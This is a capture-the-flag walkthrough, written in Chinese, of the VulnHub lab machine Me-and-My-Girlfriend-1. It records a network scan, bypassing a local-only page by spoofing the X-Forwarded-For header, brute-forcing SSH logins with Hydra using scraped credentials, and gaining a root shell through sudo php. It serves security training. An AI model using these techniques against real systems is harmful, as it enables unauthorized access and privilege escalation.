vulnhub Me-and-My-Girlfriend-1
目录
sudo arp-scan -l
┌──(jeremiah㉿kali)-[~/桌面]
└─$ sudo arp-scan -l
[sudo] jeremiah 的密码:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:49:c8:a6, IPv4: 192.168.0.112
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1 90:76:9f:cd:9b:31 (Unknown)
192.168.0.106 b4:b5:b6:73:75:81 (Unknown)
192.168.0.110 00:0c:29:62:e3:74 VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.932 seconds (132.51 hosts/sec). 3 responded
┌──(jeremiah㉿kali)-[~/桌面]
└─$
nmap -Pn -sV -p- -A 192.168.0.110
┌──(jeremiah㉿kali)-[~/桌面]
└─$ nmap -Pn -sV -p- -A 192.168.0.110
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 20:31 CST
Nmap scan report for 192.168.0.110 (192.168.0.110)
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
| 2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
| 256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_ 256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds
┌──(jeremiah㉿kali)-[~/桌面]
└─$
192.168.0.110 开放端口22、80
Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
源码:
Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -→
插件伪造XFF
X-Forwarded-For 127.0.0.1
dirb http://192.168.0.110/
┌──(jeremiah㉿kali)-[~/桌面]
└─$ dirb http://192.168.0.110/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jul 14 20:39:35 2022
URL_BASE: http://192.168.0.110/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.110/ ----
==> DIRECTORY: http://192.168.0.110/config/
+ http://192.168.0.110/index.php (CODE:200|SIZE:120)
==> DIRECTORY: http://192.168.0.110/misc/
+ http://192.168.0.110/robots.txt (CODE:200|SIZE:32)
+ http://192.168.0.110/server-status (CODE:403|SIZE:293)
---- Entering directory: http://192.168.0.110/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Thu Jul 14 20:39:41 2022
DOWNLOADED: 4612 - FOUND: 3
┌──(jeremiah㉿kali)-[~/桌面]
└─$
访问了下都没什么用
注册发现水平越权漏洞
user.txt
eweuhtandingan
aingmaung
alice
pwd.txt
skuyatuh
qwerty!!!
4lic3
hydra -L user.txt -P pwd.txt ssh://192.168.0.110
┌──(jeremiah㉿kali)-[~/桌面]
└─$ hydra -L user.txt -P pwd.txt ssh://192.168.0.110
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-07-14 20:48:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://192.168.0.110:22/
[22][ssh] host: 192.168.0.110 login: alice password: 4lic3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-07-14 20:48:28
┌──(jeremiah㉿kali)-[~/桌面]
└─$
user: alice
pwd: 4lic3
ssh alice@192.168.0.110
ls -al
cd .my_secret
ls
cat flag1.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
CMD="/bin/sh"
sudo php -r "system('$CMD');"
whomai
cd /root
ls
cat flag2.txt
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}